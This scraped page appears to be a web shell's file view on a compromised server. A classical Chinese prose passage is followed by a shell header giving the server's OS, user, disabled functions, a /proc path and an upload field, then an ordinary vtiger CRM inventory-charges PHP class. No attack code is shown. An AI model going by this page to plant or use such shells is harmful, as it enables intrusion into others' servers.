晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /proc/thread-self/root/home/akaindir/www/crm/modules/Inventory/models/ |
Upload File : |
<?php
/*+**********************************************************************************
* The contents of this file are subject to the vtiger CRM Public License Version 1.1
* ("License"); You may not use this file except in compliance with the License
* The Original Code is: vtiger CRM Open Source
* The Initial Developer of the Original Code is vtiger.
* Portions created by vtiger are Copyright (C) vtiger.
* All Rights Reserved.
************************************************************************************/
class Inventory_Charges_Model extends Vtiger_Base_Model {
const CHARGES_TABLE_NAME = 'vtiger_inventorycharges';
public function getId() {
return $this->get('chargeid');
}
public function getName() {
return $this->get('name');
}
public function getValue() {
return $this->get('value');
}
public function isTaxable() {
return $this->get('istaxable');
}
public static function getCreateChargeUrl() {
return '?module=Vtiger&parent=Settings&view=TaxAjax&mode=editCharge';
}
public function getEditChargeUrl() {
return '?module=Vtiger&parent=Settings&view=TaxAjax&mode=editCharge&chargeId='.$this->getId();
}
public function getDeleteChargeUrl() {
return '?module=Vtiger&parent=Settings&action=TaxAjax&mode=deleteCharge&chargeId='.$this->getId();
}
public function getSelectedRegions() {
$regions = $this->get('regions');
if ($regions) {
return Zend_Json::decode(html_entity_decode($regions));
}
return array();
}
public function getDisplayValue() {
$value = $this->getValue();
if ($this->get('format') === 'Flat') {
$value = CurrencyField::convertToUserFormat($value, null, true);
} else {
$value = number_format($value, getCurrencyDecimalPlaces(), '.', '') . '%';
}
return $value;
}
/**
* Function to get selected taxes
* @param <Boolean> $deleted
* @return <Array> list of Inventory_TaxRecord_Model
*/
public function getSelectedTaxes($deleted = true) {
if (!$this->taxes) {
$taxModelsList = array();
$isTaxable = $this->isTaxable();
if ($isTaxable) {
$taxes = $this->get('taxes');
if (!is_array($taxes)) {
$taxes = Zend_Json::decode(html_entity_decode($this->get('taxes')));
}
$db = PearDatabase::getInstance();
$query = 'SELECT * FROM '.Inventory_TaxRecord_Model::CHARGES_TAX_TABLE_NAME.' WHERE taxid IN ('.generateQuestionMarks($taxes).')';
if ($deleted) {
$query .= 'AND deleted = 0';
}
$result = $db->pquery($query, $taxes);
while($rowData = $db->fetch_array($result)) {
$taxModelsList[$rowData['taxid']] = new Inventory_TaxRecord_Model($rowData);
}
}
$this->taxes = $taxModelsList;
}
return $this->taxes;
}
/**
* Function to save the charge details
* @return <Number> charge id
*/
public function save() {
$db = PearDatabase::getInstance();
$chargeId = $this->getId();
$regions = Zend_Json::encode($this->get('regions'));
$taxes = Zend_Json::encode($this->get('taxes'));
$params = array($this->getName(), $this->get('format'), $this->get('type'), $this->getValue(), $regions, $this->get('istaxable'), $taxes);
if($chargeId) {
$query = 'UPDATE '.self::CHARGES_TABLE_NAME.' SET name=?, format=?, type=?, value=?, regions=?, istaxable=?, taxes=? WHERE chargeid=?';
$params[] = $chargeId;
$db->pquery($query,$params);
} else {
$query = 'INSERT INTO '.self::CHARGES_TABLE_NAME.'(name, format, type, value, regions, istaxable, taxes) VALUES('.generateQuestionMarks($params).')';
$db->pquery($query,$params);
$result = $db->pquery('SELECT chargeid FROM '.self::CHARGES_TABLE_NAME.' WHERE name=?', array($this->getName()));
$this->set('chargeid', $db->query_result($result, 0, 'chargeid'));
}
return $this->getId();
}
/**
* Function to get list of charges
* @return <Array> list of Inventory_Charges_Models
*/
public static function getInventoryCharges() {
$db = PearDatabase::getInstance();
$inventoryChargeModelsList = array();
$result = $db->pquery('SELECT * FROM '.self::CHARGES_TABLE_NAME.' WHERE deleted=?', array(0));
while($rowData = $db->fetch_array($result)) {
$inventoryChargeModelsList[$rowData['chargeid']] = new self($rowData);
}
return $inventoryChargeModelsList;
}
/**
* Function to get charge model
* @param <Number> $chargeId
* @return <Inventory_Charges_Model>
*/
public static function getChargeModel($chargeId = false) {
if ($chargeId) {
$db = PearDatabase::getInstance();
$result = $db->pquery('SELECT * FROM '.self::CHARGES_TABLE_NAME.' WHERE chargeid=? AND deleted = 0', array($chargeId));
while($rowData = $db->fetch_array($result)) {
$chargeRecordModel = new self($rowData);
}
} else {
$chargeRecordModel = new self();
}
return $chargeRecordModel;
}
/**
* Function to delete selected charges
* @param <Array> $chargeIdsList
* @return <Boolean> True/False
*/
public static function deleteCharges($chargeIdsList = array()) {
if ($chargeIdsList) {
if (!is_array($chargeIdsList)) {
$chargeIdsList = array($chargeIdsList);
}
$db = PearDatabase::getInstance();
$db->pquery('UPDATE '.self::CHARGES_TABLE_NAME.' SET deleted=1 WHERE chargeid IN ('.generateQuestionMarks($chargeIdsList).')', $chargeIdsList);
}
return true;
}
/**
* Function to get Inventory_Charges_Model model by using region id
* @param <Number> $regionId
* @return <Array> list of Inventory_Charges_Models
*/
public static function getInstancesByRegionId($regionId) {
$db = PearDatabase::getInstance();
$recordModelsList = array();
$result = $db->pquery('SELECT * FROM '.self::CHARGES_TABLE_NAME.' WHERE regions LIKE (?) AND deleted = 0', array("%\"$regionId\"%"));
while($rowData = $db->fetch_array($result)) {
$recordModelsList[$rowData['chargeid']] = new self($rowData);
}
return $recordModelsList;
}
/**
* Function to get charge models list
* @param <Array> $idsList
* @param <String> $type
* @return <Array> list of Inventory_Charges_Models
*/
public static function getChargeModelsList($idsList = array(), $type = 'all') {
$chargeModelsList = array();
if ($idsList) {
$db = PearDatabase::getInstance();
$sql = 'SELECT * FROM '.self::CHARGES_TABLE_NAME.' WHERE chargeid IN ('. generateQuestionMarks($idsList).')';
if ($type != 'all') {
$sql .= ' AND deleted = 0';
}
$result = $db->pquery($sql, $idsList);
while($rowData = $db->fetch_array($result)) {
$chargeModelsList[$rowData['chargeid']] = new self($rowData);
}
}
return $chargeModelsList;
}
/**
* Function to get charges taxes list
* @return <Array> list of Inventory_TaxRecord_Models
*/
public static function getChargeTaxesList() {
$chargeTaxesList = array();
foreach (Inventory_Charges_Model::getInventoryCharges() as $chargeId => $chargeModel) {
foreach ($chargeModel->getSelectedTaxes() as $taxId => $taxModel) {
$chargeTaxesList[$chargeId][$taxId] = $taxModel->getData();
}
}
return $chargeTaxesList;
}
/**
* Function to check duplicate charge name
* @param <String> $chargeName
* @param <Number> $excludedId
* @return <Boolean> True/False
*/
public static function checkDuplicateInventoryCharge($chargeName, $excludedId = false) {
$db = PearDatabase::getInstance();
$query = 'SELECT 1 FROM '.self::CHARGES_TABLE_NAME.' WHERE name=? AND deleted=?';
$params = array($chargeName, '0');
if ($excludedId) {
$query .= ' AND chargeid != ?';
$params[] = $excludedId;
}
$result = $db->pquery($query, $params);
return ($db->num_rows($result) > 0) ? true : false;
}
}